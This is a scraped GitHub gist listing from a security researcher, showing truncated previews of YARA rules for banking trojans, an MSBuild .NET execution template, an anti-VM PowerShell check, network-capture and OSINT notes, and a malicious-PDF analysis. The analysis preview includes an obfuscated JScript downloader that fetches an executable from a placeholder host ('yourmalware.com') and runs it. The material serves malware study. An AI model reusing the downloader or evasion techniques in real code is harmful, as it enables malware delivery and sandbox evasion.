teixeira0xfffff
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| YARA Rule Set | |
| Author: Ialle Teixeira | |
| Date: 2019-05-18 | |
| Identifier: MSI banking trojan | |
| */ | |
| rule sig_09328irpf_restiruir_ { | |
| meta: | |
| description = "reported by @DefesaDigital - file 09328irpf_restiruir_.msi" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| YARA Rule Set | |
| Author: Ialle Teixeira | |
| Date: 2019-05-18 | |
| Identifier: .LNK banking trojan | |
| */ | |
| rule Dil_Peticao_99845650 { | |
| meta: | |
| description = "reported by @DefesaDigital - file Dil_Peticao_99845650.lnk" |
teixeira0xfffff
/ gist:c5333504841978a359c540f837ab0a18
Created
May 27, 2019 00:25
MSBuild - Property functions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
| <Target Name="Hello" > | |
| <!-- Call ANY .NET API --> | |
| <!-- | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
teixeira0xfffff
/ resources.bin
Created
June 2, 2019 22:52
Redteam/Pentesting/Hacking/Cybersecurity/OSINT Resources
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ++++++ Basic knowledge requirements for cybersecurity and hacking ++++++ | |
| These are the basic competencies expected (and tested for during the 1st in person interview) by a large, very visible InfoSec company I think it is a good base competency list for anyone looking to get into an Infosec career (with specialization plus and some programming /scripting ability) or learn cybersecurity/hacking as a hobby: | |
| Networking: Good understanding of OSI layer model / Understating of communication flow through each layer / Good understanding of functions of each layer / Understanding of major protocols in each layer / In-depth understanding Layer 3 & Layer 4 protocols IP, ICMP Protocols (layer 3) TCP, UDP Protocols (layer 4) | |
| Overview of TCP/IP Layer model: ARP / Understanding of Client & Server communication model / Ports common services run on / Ephemeral port vs Well known ports | |
| Understanding of major (everyday Layer 7) services/protocols: DNS o DHCP o HTTP HTTP Header Fields HTTP Status Codes How HTTP mainta |
teixeira0xfffff
/ MSAcpi_ThermalZoneTemperature.ps1
Created
June 18, 2019 05:36
Anti-VM Techniques with MSAcpi_ThermalZoneTemperature
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-AntiVMwithTemperature { | |
| $t = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace "root/wmi" | |
| $valorTempKelvin = $t.CurrentTemperature / 10 | |
| $valorTempCelsius = $valorTempKelvin - 273.15 | |
| $valorTempFahrenheit = (9/5) * $valorTempCelsius + 32 | |
| return $valorTempCelsius.ToString() + " C : " + $valorTempFahrenheit.ToString() + " F : " + $valorTempKelvin + "K" | |
| } |
teixeira0xfffff
/ gist:2ed9152acea792be7dffbf0aa0191b29
Last active
July 31, 2019 10:55
Argus/TCPDump/Tshark Date real time
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ~ apt install tcpdump | |
| ~ apt install argus-client | |
| ~tcpdump -nn -s0 -rYourdump.pcap -w - |argus -r - -AZJmR -w - |ra -n -Zb -L10 -r - -s +dur +synack +ackdat +swin +dwin +rate +ĺoad +tcprtt +loss +runtime +retrans +sgap +dgap - tcp |xargs -d$'\n' -L1 sh -c 'date "+%d.%m.%Y %T $0"' | |
teixeira0xfffff
/ twitterOSINT
Last active
October 26, 2024 22:16
Twitter advanced search for OSINT purpose
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ▪️ containing both “watching” and “now”. This is the default operator **watching now** | |
| ▪️ containing the exact phrase “happy hour”: **“happy hour”** | |
| ▪️ containing either “love” or “hate” (or both): **love OR hate** | |
| ▪️ containing “beer” but not “root”: **beer -root** | |
| ▪️ containing the hashtag **“haiku”** |
teixeira0xfffff
/ gist:6ccbdbef95da08dcf2e213b99e4b9533
Last active
September 1, 2021 21:16
Analyzing Malicious Documents (PDF file)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Name: SCAN_0502_FA2C8.pdf | |
| MD5 dfc20138456eb478673e046754536c76 | |
| SHA-1 bbc5dbdf9bbf844854dc52f47b03b88ebac5bc17 | |
| SHA-256 a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9 | |
| Vhash 913a9ca88f467c85a8c6e005b9321caa5 | |
| SSDEEP 384:fC3s7nDeeTykyBmtnbFOB444uBAzLzobLTbL4wu:fC3sO+AAxOBhfAzAbPb8wu | |
| File type PDF | |
| Magic PDF document, version 1.4 | |
| File size 16.93 KB (17337 bytes) | |
| https://www.virustotal.com/gui/file/a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9/details |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /***************************************************************************/ | |
| /* */ | |
| /* This obfuscated code was created by Javascript Obfuscator Free Version.*/ | |
| /* Javascript Obfuscator Free Version can be downloaded here */ | |
| /* http://javascriptobfuscator.com */ | |
| /* */ | |
| /***************************************************************************/ | |
| var _$_850e = ["http://yourmalware.com/dm.exe", "WScript.Shell", "CreateObject", "Scripting.FileSystemObject", "GetSpecialFolder", "\\0Whst.exe", "MSXML2.XMLHTTP", "GET", "open", "send", "Status", "FileExists", "DeleteFile", "ADODB.Stream", "Open", "Type", "ResponseBody", "Write", "Position", "SaveToFile", "Close", "Run"]; | |
| var url = _$_850e[0]; | |
| var WshShell = WScript[_$_850e[2]](_$_850e[1]); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| '... that the Ludington family included a teenage girl (statue pictured) whose night-long ride to alert the Continental Army of an imminent British attack has been compared to the ride of Paul Revere?... that actress Siobhan Finneran said she wanted her Downton Abbey character "flung off the roof of the Abbey?' | |
| '... that red-headed pine sawfly larvae drag pine needles into the silken tubes in which they live?' | |
| '... that theoretical physicist Deepak Dhar and Ramakrishna Ramaswamy solved the Abelian sandpile model of self-organized criticality with their Dhar-Ramaswamy model?' | |
| '... that Seattles passenger-only ferries, blamed for beach erosion, were forced to slow down because of a class-action lawsuit?' | |
| '... that Juana Bordas says her parents were uncomfortable with the idea of her leaving home to go to college due to the "crab syndrome"?' | |
| '... that the Soviet Armys 7th Guards Tank Division was part of the Group of Soviet Forces in Germany for 43 years during the Cold War?' | |
| '... that the call letters of radio |
OlderNewer